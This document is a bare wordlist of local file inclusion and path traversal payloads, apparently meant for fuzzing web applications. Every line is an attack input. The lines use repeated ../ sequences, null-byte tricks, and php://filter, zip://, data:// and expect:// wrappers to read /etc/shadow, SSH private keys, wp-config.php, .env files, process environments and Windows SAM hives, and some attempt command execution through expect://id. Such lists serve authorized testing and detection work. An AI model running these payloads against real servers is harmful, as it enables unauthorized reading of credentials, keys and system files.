/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/issue
/etc/os-release
/etc/resolv.conf
/etc/hostname
/etc/motd
/etc/apache2/apache2.conf
/etc/apache2/sites-enabled/000-default.conf
/etc/httpd/conf/httpd.conf
/etc/nginx/nginx.conf
/etc/nginx/sites-enabled/default
/etc/mysql/my.cnf
/etc/postgresql/12/main/postgresql.conf
/etc/ssh/sshd_config
/etc/ssh/ssh_config
/etc/crontab
/etc/cron.d
/etc/cron.daily
/etc/cron.hourly
/etc/cron.weekly
/etc/cron.monthly
/etc/sudoers
/etc/sudoers.d/README
/etc/pam.d/common-auth
/etc/passwd%00
/etc/shadow%00
/etc/hosts%00
/etc/passwd?0=.
/etc/passwd?0=%00
/etc/passwd..
/etc/passwd......
../../../../../../../../../../etc/passwd
../../../../../../../../../../etc/shadow
../../../../../../../../../../etc/hosts
../../../../../../../../../../etc/nginx/nginx.conf
../../../../../../../../../../etc/apache2/apache2.conf
../../../../../../../../../../etc/mysql/my.cnf
../../../../../../../../../../etc/ssh/sshd_config
../../../../../../../../../../etc/crontab
../../../../../../../../../../var/log/auth.log
../../../../../../../../../../var/log/syslog
../../../../../../../../../../var/log/messages
../../../../../../../../../../var/log/secure
../../../../../../../../../../var/log/nginx/access.log
../../../../../../../../../../var/log/nginx/error.log
../../../../../../../../../../var/log/apache2/access.log
../../../../../../../../../../var/log/apache2/error.log
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../../../../../../../../../../var/log/tomcat/catalina.out
../../../../../../../../../../var/log/mysql/error.log
../../../../../../../../../../var/log/php-fpm/error.log
../../../../../../../../../../var/www/html/index.php
../../../../../../../../../../var/www/html/config.php
../../../../../../../../../../var/www/html/wp-config.php
../../../../../../../../../../home/ubuntu/.ssh/authorized_keys
../../../../../../../../../../home/ubuntu/.ssh/id_rsa
../../../../../../../../../../home/ec2-user/.ssh/authorized_keys
../../../../../../../../../../home/ec2-user/.ssh/id_rsa
../../../../../../../../../../home/admin/.ssh/authorized_keys
../../../../../../../../../../home/admin/.ssh/id_rsa
../../../../../../../../../../root/.ssh/authorized_keys
../../../../../../../../../../root/.ssh/id_rsa
../../../../../../../../../../proc/self/environ
../../../../../../../../../../proc/self/cmdline
../../../../../../../../../../proc/self/status
../../../../../../../../../../proc/self/fd/0
../../../../../../../../../../proc/1/cmdline
../../../../../../../../../../proc/version
../../../../../../../../../../proc/net/tcp
../../../../../../../../../../proc/net/fib_trie
../../../../../../../../../../proc/net/arp
../../../../../../../../../../proc/config.gz
../../../../../../../../../../proc/mounts
../../../../../../../../../../proc/sched_debug
../../../../../../../../../../proc/self/fd/1
../../../../../../../../../../proc/self/fd/2
../../../../../../../../../../proc/self/fd/3
../../../../../../../../../../proc/self/fd/4
../../../../../../../../../../proc/self/fd/5
../../../../../../../../../../proc/self/fd/6
../../../../../../../../../../proc/self/fd/7
../../../../../../../../../../proc/self/fd/8
../../../../../../../../../../proc/self/fd/9
../../../../../../../../../../proc/self/fd/10
../../../../../../../../../../proc/self/fd/11
../../../../../../../../../../proc/self/fd/12
../../../../../../../../../../proc/self/fd/13
../../../../../../../../../../proc/self/fd/14
../../../../../../../../../../proc/self/fd/15
../../../../../../../../../../proc/self/maps
../../../../../../../../../../proc/self/mountinfo
../../../../../../../../../../proc/self/cwd/index.php
../../../../../../../../../../proc/self/cwd/config.php
../../../../../../../../../../proc/self/cwd/.env
../../../../../../../../../../proc/self/cwd/.htaccess
../../../../../../../../../../proc/self/cwd/.git/config
../../../../../../../../../../proc/self/cwd/.ssh/id_rsa
../../../../../../../../../../proc/self/root/etc/passwd
../../../../../../../../../../proc/self/root/etc/shadow
../../../../../../../../../../proc/self/root/etc/hosts
../../../../../../../../../../proc/self/root/proc/self/environ
../../../../../../../../../../proc/self/root/var/log/auth.log
../../../../../../../../../../proc/self/root/var/log/nginx/error.log
../../../../../../../../../../proc/self/root/var/www/html/wp-config.php
../../../../../../../../../../sys/class/net/eth0/address
../../../../../../../../../../sys/kernel/security/apparmor/profiles
../../../../../../../../../../sys/kernel/security/lsm
../../../../../../../../../../sys/kernel/debug/tracing/available_filters
../../../../../../../../../../sys/kernel/debug/tracing/trace
../../../../../../../../../../sys/firmware/devicetree/base/model
../../../../../../../../../../sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq
../../../../../../../../../../sys/devices/virtual/dmi/id/product_name
../../../../../../../../../../sys/devices/virtual/dmi/id/board_serial
../../../../../../../../../../sys/devices/virtual/dmi/id/product_serial
../../../../../../../../../../sys/devices/virtual/dmi/id/product_uuid
../../../../../../../../../../sys/block/sda/device/model
../../../../../../../../../../sys/block/xvda/device/model
../../../../../../../../../../sys/block/sda/queue/rotational
../../../../../../../../../../sys/block/sda/queue/scheduler
../../../../../../../../../../sys/block/sda/stat
php://filter/convert.base64-encode/resource=index.php
php://filter/convert.base64-encode/resource=config.php
php://filter/convert.base64-encode/resource=wp-config.php
php://filter/resource=index.php
php://filter/resource=config.php
php://input
php://fd/0
php://fd/1
php://fd/2
php://memory
php://temp
php://temp/maxmemory:100000000
php://stdin
php://stdout
php://stderr
php://output
zip://../../../../../../../../../../var/www/html/index.php%23
zip://../../../../../../../../../../var/www/html/config.php%23
zip://../../../../../../../../../../var/www/html/wp-config.php%23
php://filter/read=convert.base64-encode/resource=../../../../../../../../../../etc/passwd
php://filter/read=convert.base64-encode/resource=../../../../../../../../../../var/www/html/wp-config.php
expect://id
expect://cat%20/etc/passwd
data://text/plain;base64,L2V0Yy9wYXNzd2Q=
file:../../../../../../../../../../etc/passwd
file:///etc/passwd
file:///C:/Windows/win.ini
file:///C:/Windows/system.ini
file:///C:/Windows/System32/drivers/etc/hosts
file:///C:/Windows/System32/config/SAM
file:///C:/Windows/System32/config/SYSTEM
file:///C:/Windows/System32/config/SOFTWARE
file:///C:/Windows/System32/config/SECURITY
file:///C:/Windows/System32/config/DEFAULT
file:///C:/boot.ini
file:///C:/inetpub/wwwroot/web.config
file:///C:/Windows/Panther/Unattend/unattend.xml
file:///C:/Windows/Panther/unattend.xml
file:///C:/Windows/Panther/Unattend/Unattend.xml
file:///C:/Windows/System32/winevt/Logs/System.evtx
file:///C:/Windows/System32/winevt/Logs/Security.evtx
file:///C:/Windows/System32/winevt/Logs/Application.evtx
..
..
..
..././.././.././../etc/passwd
...\.\.\.\windows\win.ini
